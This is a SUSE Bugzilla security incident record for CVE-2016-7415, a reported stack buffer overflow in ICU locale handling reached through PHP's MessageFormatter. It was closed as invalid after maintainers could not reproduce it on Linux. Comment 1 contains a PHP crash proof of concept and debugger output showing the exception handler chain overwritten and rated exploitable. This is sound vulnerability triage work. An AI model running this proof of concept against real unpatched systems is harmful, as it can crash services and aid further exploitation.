999822 – (CVE-2016-7415) VUL-0: CVE-2016-7415: icu: Stack based buffer overflow in locid.cpp

Bug 999822 (CVE-2016-7415) - VUL-0: CVE-2016-7415: icu: Stack based buffer overflow in locid.cpp

Summary: VUL-0: CVE-2016-7415: icu: Stack based buffer overflow in locid.cpp

Status:	RESOLVED INVALID

Alias:	CVE-2016-7415

Product:	SUSE Security Incidents
Classification:	Novell Products
Component:	Incidents (show other bugs)
Version:	unspecified
Hardware:	Other Other

Priority:	P3 - Medium Severity: Normal
Target Milestone:	---
Assignee:	Cliff Zhao
QA Contact:	Security Team bot

URL:	https://smash.suse.de/issue/172665/
Whiteboard:	CVSSv2:SUSE:CVE-2016-7415:6.8:(AV:N/A...
Keywords:

Depends on:
Blocks:

Clone This Bug

Reported:	2016-09-20 06:51 UTC by Victor Pereira
Modified:	2017-10-19 15:10 UTC (History)
CC List:	3 users (show)

See Also:
Found By:	Security Response Team
Services Priority:
Business Priority:
Blocker:	---
Marketing QA Status:	---
IT Deployment:	---

Attachments
CVE-2016-7415.c (303 bytes, text/plain) 2016-12-20 17:21 UTC, Marcus Meissner	Details
View All Add an attachment (proposed patch, testcase, etc.)

Note You need to log in before you can comment on or make changes to this bug.

Description Victor Pereira 2016-09-20 06:51:53 UTC

rh#1377361

It was found that big locale string causes stack based overflow inside libicu.

PHP bug:

https://bugs.php.net/bug.php?id=73007

References:
https://bugzilla.redhat.com/show_bug.cgi?id=1377361
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7415
http://seclists.org/oss-sec/2016/q3/518
http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-7415.html
http://www.cvedetails.com/cve/CVE-2016-7415/

Comment 1 Victor Pereira 2016-09-20 14:46:34 UTC

Test script:
---------------
<?php

ini_set('memory_limit', -1);

$v1 = str_repeat("ABCE", 503566756/3);
$v2 = "test";
$v3 = [];

MessageFormatter::formatMessage($v1, $v2, $v3);
// msgfmt_format_message($v1, $v2, $v3);

Expected result:
----------------
no crash

Actual result:
--------------
Microsoft (R) Windows Debugger Version 6.11.0001.404 AMD64
Copyright (c) Microsoft Corporation. All rights reserved.

CommandLine: C:\tools\php7010\php.exe -n -dextension=ext\php_bz2.dll  -dextension=ext\php_com_dotnet.dll  -dextension=ext\php_curl.dll  -dextension=ext\php_enchant.dll  -dextension=ext\php_exif.dll  -dextension=ext\php_fileinfo.dll  -dextension=ext\php_ftp.dll  -dextension=ext\php_gd2.dll  -dextension=ext\php_gettext.dll  -dextension=ext\php_gmp.dll  -dextension=ext\php_imap.dll  -dextension=ext\php_intl.dll  -dextension=ext\php_ldap.dll  -dextension=ext\php_mbstring.dll  -dextension=ext\php_mysqli.dll   -dextension=ext\php_odbc.dll  -dextension=ext\php_openssl.dll   -dextension=ext\php_pdo_mysql.dll   -dextension=ext\php_pdo_odbc.dll  -dextension=ext\php_pdo_pgsql.dll  -dextension=ext\php_pdo_sqlite.dll  -dextension=ext\php_pgsql.dll  -dextension=ext\php_phpdbg_webhelper.dll  -dextension=ext\php_shmop.dll  -dextension=ext\php_soap.dll  -dextension=ext\php_sockets.dll  -dextension=ext\php_sqlite3.dll  -dextension=ext\php_sysvshm.dll  -dextension=ext\php_tidy.dll  -dextension=ext\php_xmlrpc.dll  -dextension=ext\php_xsl.dll  -dextension=ext\php_yaml.dll poc.php

...

(e5c.d80): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** WARNING: Unable to verify checksum for C:\tools\php7010\icuuc57.dll
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\tools\php7010\icuuc57.dll - 
Processing initial command 'r;!exploitable -v'
icuuc57!icu_57::Locale::Locale+0x27c:
4a85613c 8801            mov     byte ptr [ecx],al          ds:002b:05360000=00
0:000:x86> r;!exploitable -v
eax=0535e545 ebx=00000000 ecx=05360000 edx=10201a74 esi=0535e59d edi=00000000
eip=4a85613c esp=0535e55c ebp=0535e64c iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
icuuc57!icu_57::Locale::Locale+0x27c:
4a85613c 8801            mov     byte ptr [ecx],al          ds:002b:05360000=00

!exploitable 1.6.0.0
HostMachine\HostUser
Executing Processor Architecture is x86
Debuggee is in User Mode
Debuggee is a live user mode debugging session on the local machine
Event Type: Exception
Exception Faulting Address: 0x5360000
First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005)
Exception Sub-Type: Write Access Violation

Exception Hash (Major/Minor): 0xbf0ac847.0x9fec2922

 Hash Usage : Stack Trace:
Major+Minor : icuuc57!icu_57::Locale::Locale+0x27c
Major+Minor : Unknown
Major+Minor : Unknown
Major+Minor : Unknown
Major+Minor : Unknown
Minor       : Unknown
Minor       : Unknown
Minor       : Unknown
Minor       : Unknown
Minor       : Unknown
Minor       : Unknown
Minor       : Unknown
Minor       : Unknown
...
Minor       : Unknown
Minor       : Unknown
Minor       : Unknown
Minor       : Unknown
Minor       : Unknown
Instruction Address: 0x000000004a85613c

Description: Exception Handler Chain Corrupted
Short Description: ExceptionHandlerCorrupted
Exploitability Classification: EXPLOITABLE
Recommended Bug Title: Exploitable - Exception Handler Chain Corrupted starting at icuuc57!icu_57::Locale::Locale+0x000000000000027c (Hash=0xbf0ac847.0x9fec2922)

Corruption of the exception handler chain is considered exploitable
0:000:x86> !exchain
000000000535e640: 0000000043424145
Invalid exception stack at 0000000043424145     // Exception handler overwrote to 'ABCE'
0:000:x86> k
ChildEBP RetAddr  
WARNING: Stack unwind information not available. Following frames may be wrong.
0535e64c 43424145 icuuc57!icu_57::Locale::Locale+0x27c
0535e650 43424145 0x43424145
0535e654 43424145 0x43424145
0535e658 43424145 0x43424145
0535e65c 43424145 0x43424145
0535e660 43424145 0x43424145
0535e664 43424145 0x43424145
0535e668 43424145 0x43424145
0535e66c 43424145 0x43424145
0535e670 43424145 0x43424145
0535e674 43424145 0x43424145
0535e678 43424145 0x43424145
0535e67c 43424145 0x43424145
0535e680 43424145 0x43424145
0535e684 43424145 0x43424145
0535e688 43424145 0x43424145
0535e68c 43424145 0x43424145
0535e690 43424145 0x43424145
0535e694 43424145 0x43424145
0535e698 43424145 0x43424145

Comment 3 Swamp Workflow Management 2016-09-20 22:00:50 UTC

bugbot adjusting priority

Comment 4 Victor Pereira 2016-10-06 13:16:50 UTC

The code is there, however in some code streams we have the -fstack-protector compiler flag enable, which works as workaround. Please submit to all codestreams

Comment 7 Victor Pereira 2016-12-16 08:44:59 UTC

the upstream bug http://bugs.icu-project.org/trac/ticket/12745

Comment 8 Marcus Meissner 2016-12-20 17:07:27 UTC

If this is in Locale::Locale of icu, and tries to overflow the fullname buffer...

even sles10 sp3 seems to have buffer management to avoid overflowing that.

Comment 9 Marcus Meissner 2016-12-20 17:21:03 UTC

Created attachment 707308 [details]
CVE-2016-7415.c

QA REPRODUCER:

gcc -O2 -Wall -g CVE-2016-7415.c -o CVE-2016-7415 -licui18n
./CVE-2016-7415

should not crash

Comment 10 Marcus Meissner 2016-12-20 17:22:13 UTC

I think the reproducer captures the essence of the problem.

But it does not crash for me.

Comment 11 Marcus Meissner 2016-12-21 10:17:01 UTC

The only reason this could crash if the size calculation in Locale::Locale in 
icu/source/common/locid.cpp 
does not match the strings copied later on.

I looked over the code and it all looks okish to me.

unless we have a wworking reproducer on Linux I would consider this not an issue.

Comment 12 Felix Zhang 2017-03-01 16:17:58 UTC

Reassign to our current icu maintainer.

Comment 13 Cliff Zhao 2017-10-13 12:38:55 UTC

(In reply to Marcus Meissner from comment #11)
> The only reason this could crash if the size calculation in Locale::Locale
> in 
> icu/source/common/locid.cpp 
> does not match the strings copied later on.
> 
> I looked over the code and it all looks okish to me.
> 
> unless we have a wworking reproducer on Linux I would consider this not an
> issue.

If so, Can we close this as not a bug?

Comment 14 Marcus Meissner 2017-10-19 15:10:32 UTC

yes